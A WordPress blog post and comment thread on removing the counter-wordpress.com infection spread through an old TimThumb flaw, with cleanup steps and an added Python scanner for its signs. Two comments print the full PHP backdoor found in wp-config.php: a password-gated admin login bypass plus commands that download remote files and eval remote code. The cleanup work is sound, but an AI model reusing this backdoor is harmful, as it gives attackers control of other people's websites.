Delete malware warning counter-wordpress.com

There is a vulnerability in old versions of TimThumb; read the article about it here. This week (starting August 22) many WordPress users running TimThumb ran into problems with their websites: Google flagged their websites as a risk (including one of my websites).

The infected websites connected to counter-wordpress.com. The script/malware was able to access your database, create a database dump, play sounds (?), read your WordPress password and more. Using the curl_setopt function, the attackers were able to download and install PHP scripts on your server.
So for those who have problems, here is a quick guide to fix this. And for those who don’t have problems yet: update TimThumb (latest version here)!

Fix this malware warning step by step:

  • Remove the malicious code from your wp-config.php or upload a clean version.
    • Inspect your wp-config.php. The attackers add about 3000 empty lines, and somewhere in the middle of them is the malicious code. Delete it!
  • Delete the files they injected with the curl_setopt function:
    • wp-admin/upd.php
    • wp-content/upd.php
  • Some WordPress users (I didn’t) found a ‘temp’ folder in their current theme folder with a file named like eab9c5e9815adc4c40a6557495eed6d3.php, or something similar. Delete it.
  • Update your WordPress if possible!
  • Replace the following files with the original files from a clean WordPress installation:
    • wp-settings.php
    • wp-includes/js/jquery/jquery.js
    • wp-includes/js/l10n.js
    • If you have problems overwriting them, delete them first (via FTP) and then upload the new files.
  • Replace TimThumb with the latest version.
  • Change your FTP password.
  • Change your DB password and update it in wp-config.php.
  • If Google is warning your visitors (right above the result description in the SERP), log in to Webmaster Tools and request a review. The warning should be gone within 24 hours.
  • To be sure, check your website with these tools:
  • You’re done!
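As an added example (not part of the original post), here is a small scanner that checks a WordPress tree for the indicators the steps above list: the padded wp-config.php backdoor, the dropped upd.php files, an md5-named .php inside a theme folder, and counter-wordpress.com references in l10n.js/jquery.js. It runs against a constructed sample tree; the 500-line padding threshold and the regex patterns are my assumptions.

```python
import re
import tempfile
from pathlib import Path

# Indicators from the cleanup steps above: a wp-config.php backdoor keyed on
# ?pingnow= and buried under thousands of blank lines, upd.php dropped into
# wp-admin/ and wp-content/, an md5-named .php inside a theme folder, and
# l10n.js / jquery.js edited to reference counter-wordpress.com.
BACKDOOR_RE = re.compile(r"\$_GET\['pingnow'\]|curl_setopt\(|eval\(\$re\)")
MD5_PHP_RE = re.compile(r"^[0-9a-f]{32}\.php$")

def longest_blank_run(text):
    run = best = 0
    for line in text.splitlines():
        run = 0 if line.strip() else run + 1
        best = max(best, run)
    return best

def scan_wordpress(root):
    findings = []  # (relative path, reason) pairs
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        parent = path.parent.relative_to(root).as_posix()
        if path.name == "upd.php" and parent in ("wp-admin", "wp-content"):
            findings.append((rel, "upd.php dropped by the curl_setopt backdoor"))
        if MD5_PHP_RE.match(path.name) and rel.startswith("wp-content/themes/"):
            findings.append((rel, "md5-named .php file inside a theme folder"))
        if path.name in ("wp-config.php", "l10n.js", "jquery.js"):
            text = path.read_text(errors="replace")
            if BACKDOOR_RE.search(text):
                findings.append((rel, "pingnow/curl/eval backdoor code"))
            if "counter-wordpress.com" in text:
                findings.append((rel, "reference to counter-wordpress.com"))
            if longest_blank_run(text) >= 500:  # the post saw ~3000 padding lines (assumed threshold)
                findings.append((rel, "padded with a huge run of blank lines"))
    return sorted(findings)

def build_sample_install():
    # Constructed sample tree (not a real site) that shows each indicator once.
    root = tempfile.mkdtemp()
    samples = {
        "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\n" + "\n" * 3000
        + "if (isset($_GET['pingnow']) && isset($_GET['pass'])) { }\n",
        "wp-admin/upd.php": "<?php // dropped by the backdoor\n",
        "wp-content/themes/mytheme/temp/eab9c5e9815adc4c40a6557495eed6d3.php": "<?php\n",
        "wp-includes/js/l10n.js": "var s = 'counter-wordpress.com';\n",
    }
    for rel, body in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
    return root
```

Run scan_wordpress() against the document root of a real install; every finding it prints is a file to clean or replace per the steps above, while a clean install yields no findings.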

Hopefully your site will be clean after you have followed the steps above. If you found other suspicious things, please let me know by writing a comment.

61 thoughts on “Delete malware warning counter-wordpress.com”

  1. Great, first one to comment. Your blog came at the right time as this issue with my website just happened this morning. I did all the steps you have given me. I’m just waiting for the review from Webmaster Tools. I hope it will work. Big thanks for this

    • Thanks Willian, that’s good to know. When you want to update WordPress you can enable it again, because it needs the curl function.

  2. This was in my wp-config; I deleted it:

    // Backdoor: only runs when the request carries ?pingnow=...&pass=<attacker's secret>
    if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
        if ($_GET['pass'] == 'xxxxxxxxxxxxxxxxxxxxxxxxxxx') {
            // 'login': logs the visitor in as the 'admin' user without a password
            if ($_GET['pingnow'] == 'login') {
                $user_login = 'admin';
                $user = get_userdatabylogin($user_login);
                $user_id = $user->ID;
                wp_set_current_user($user_id, $user_login);
                wp_set_auth_cookie($user_id);
                do_action('wp_login', $user_login);
            }
            // 'exec': downloads the URL in ?file= into a random .php name on the server
            // (this is where the md5-named .php files mentioned in the post come from)
            if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                $fnm = md5(rand(0,100)).'.php';
                $fp = fopen($fnm, "w");
                curl_setopt($ch, CURLOPT_FILE, $fp);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                curl_exec($ch);
                curl_close($ch);
                fclose($fp);
                echo "location.href='$fnm';";
            }
            // 'eval': fetches the URL in ?file= and runs the response as PHP
            if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                $re = curl_exec($ch);
                curl_close($ch);
                eval($re);
            }
        }
    }
  3. Thanks for your post!

    My problem was also one line in the header:

    I added wp_deregister_script(‘l10n’); in my theme’s functions.php and I got rid of the Google warnings…

    • You’re welcome! Well, just removing l10n from the header isn’t the best solution. Download a fresh copy of WordPress and replace the file wp-includes/js/l10n.js. Good luck!

      • I know it’s not the best way to do it, but a fresh l10n.js didn’t help in my situation. Maybe the reason is that the Google warning message is not about my site but about an invisible link to “counter-wordpress” (I don’t know where or why this link is coming from). At least my system is working, and it also seems to download faster…

  4. Hi,
    Thanks for this useful information!
    Since I’ve installed the WEBphysiology portfolio software, I was infected with the malware code.
    I found the extra lines in my wp_config file and I’ve removed it. In fact I’ve followed exactly your steps.
    Although it looks like my site is clean, I still get the warning message when logging in.
    I’ve checked my webmaster dashboard, but it says there is no malware found…
    Any idea how to solve this problem? And how can I figure out if I am really clean?

    Thanks for your useful help so far!

  5. Hello William and thank you for the insights. Both my websites got hit with the malware. One has been blocked by google: http://www.fotografomatrimonioroma.it
    I followed your clear and precise instructions up to: replace the following file with original files from a clean WordPress installation:
    wp-settings.php
    wp-includes/js/jquery/jquery.js
    wp-includes/js/l10n.js
    When I tried to substitute the files from a previous clean WordPress backup the website went down, missing info in different lines. When I inspected e.g. the wp-settings.php files, they vary in other content besides the malware code. So I wasn’t able to fully recuperate the situation: when I run the scuri scanner it still tells me that the site is JavaScript infected. I also ran the scuri WP check and it tells me that the site is ok. Do you think I am ok like this or is there something I can do to fix the corrupted JavaScript? Many thanks for your help

  6. Geezz… so many things to do. O_O Thanks for the step by step. I thought it was just in my theme. But when I viewed the source, I found nothing about the counter-wordpress.com domain. I’m soooo dooomed if I hadn’t read this post! Thanks again!

  7. I have recently got this problem –

    for some reason I cannot delete/overwrite my wp-config.php. It had the huge gap and the code half way down – just as you had described. I downloaded it from my FTP and altered it. I then uploaded the new/clean version and put it back into the same folder. I then renamed the old corrupt config file and moved it, hoping it won’t be read at all.

    I also have this file as you described ed59d62e1b1e2167275feed65b374079.php

    But I cannot find it anywhere on my ftp to delete – any ideas where I can find this thing?

    • Thanks for pointing out the overwrite problem, I had the same thing. I will put a note in my post so other people know.

      Do you mean you can’t find the ed59d62e1b1e2167275feed65b374079.php (or something like that) file on your server?

      I didn’t have that file either, but some other users had. So if you can’t find it, don’t worry, I think it was never there.

      • I contacted the support team that supplied me with the theme. They knew all about this error. It was something that involved Timthumb script – it was vulnerable.

        They uploaded a newer version of the theme which appears to have solved the error messages. The new theme does not support the TimThumb script either. Touch wood I won’t have a repeat of such matters. Thanks for your help on this. Anybody reading this, just try updating to the newest version of your blog theme, and delete any that you’re not using.

  8. Hi,
    Just an update about the status of my malware warning screen.
    It seems all my problems are solved!

    As described in my previous reply, I still got the malware warning after logging in to the admin.
    Today I finally fixed this issue! It seems like the warning is caused by the plugin google-analytics-dashboard. Since I’ve removed that plugin, the warning is instantly gone.
    So beware, there could be something wrong with this plugin.

    • Thanks for your update! That’s pretty strange. Didn’t you find any strange files in the google-analytics-dashboard folder?

  9. Pingback: counter-wordpress.com Uyarısı ve Çözümü | İnternet Durağı

  10. I followed these steps. I found the site to be clean upon following them. I have even changed the database user passwords. But the problem seems to be never ending. The malware is coming back again and again. The problem is with these two files, l10n.js and jquery.js.

    I have some 3 to 4 wordpress installations on my hosting account. All of them are having same problem.

    How can I solve the issue? Thanks in advance.

    • Did you really follow all the steps? Did you also overwrite the files l10n.js and jquery.js with clean files? Update timthumb.php?
      If you need help send me an e-mail at info[at]reinaris.nl

      • Hi Rein,

        I didn’t update the timthumb.php files! I did it now. Hope this fixes everything. What about the timthumb.txt which I found in some of the cache folders when I searched? Do I have to delete them?

        Thanks a lot for the help! :)

          • The problem is back! :( jquery.js and l10n.js got infected again.

            I updated timthumb.php on all the wordpress installations. Followed all other steps as you told, but still the issue is back..!

            Can you help me in resolving this issue

            • If you really did all the steps I mentioned above (like removing the upd.php files etc.) and you still have problems, I can help you out. Send me an email (info[at]reinaris.nl) with FTP/WP-Admin details and I will take a look.

              But please try it yourself by following all the steps in the post above carefully.

              • Hi, I have done all the things you said except these.

                I didn’t find upd.php files anywhere in the directories you mentioned.

                I don’t have an FTP account. I installed it through the fantastico deluxe. So do I have to change the cPanel login also? I already changed the DB passwords and updated it in config file.

                I am losing hope of getting rid of it. I set the permissions of the two files l10n.js and jquery.js to 444, revoking write rights even for the admin, and hope it will work.

                So far the site is good. The malware infection is happening exactly once a day.

                If the problem persists, I will definitely mail you and seek your help. Thanks a lot for being so kind.

                • No you don’t have to change your cpanel pass. If you still encounter problems, create an ftp account and contact me :) I hope your website will be malware-free!!

  11. Pingback: Malware Attack! | Oddly Enough

  12. Pingback: Mein Blog hats erwischt: Warnung Malware gefunden – counter-wordpress.com « Fene-Blog

  13. Hi,

    Thank you for the great tutorial.

    I have a problem with this step – ‘Change your DB password and change it in wp-config.php’

    Where do I change the database password?

    Thanks!

  14. 1 question:
    “upd.php” = “upgrade.php” ???

    I didn’t find upd.php files anywhere in the directories, just “upgrade.php”….

    Do I need to delete these:
    wp-admin/upgrade.php
    wp-content/upgrade.php

    ???

    tks!

    • Please take a look at the file. If it looks something like this:

      if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
          if ($_GET['pass'] == 'xxxxxxxxxxxxxxxxxxxxxxxxxxx') {
              if ($_GET['pingnow'] == 'login') {
                  $user_login = 'admin';
                  $user = get_userdatabylogin($user_login);
                  $user_id = $user->ID;
                  wp_set_current_user($user_id, $user_login);
                  wp_set_auth_cookie($user_id);
                  do_action('wp_login', $user_login);
              }
              if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
                  $ch = curl_init($_GET['file']);
                  $fnm = md5(rand(0,100)).'.php';
                  $fp = fopen($fnm, "w");
                  curl_setopt($ch, CURLOPT_FILE, $fp);
                  curl_setopt($ch, CURLOPT_HEADER, 0);
                  curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                  curl_exec($ch);
                  curl_close($ch);
                  fclose($fp);
                  echo "location.href='$fnm';";
              }
              if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
                  $ch = curl_init($_GET['file']);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                  curl_setopt($ch, CURLOPT_HEADER, 0);
                  curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                  $re = curl_exec($ch);
                  curl_close($ch);
                  eval($re);
              }
          }
      }

      Then it’s the malware. Delete it!

      I read the ‘malware people’ are changing their filenames…

  15. Thanks for this awesome post. I fixed the virus a few months ago but I didn’t realize that it left some remnants of its ill coding in some of my WordPress files. I think I finally got my site cleaned now!

  16. I have a website (wordpress / magento) infected by this malware.
    When I look at the wp-config.php, the information about the database connection is not the right one. And my database is empty.
    Has anyone already had this case?

  17. Pingback: Script installation service
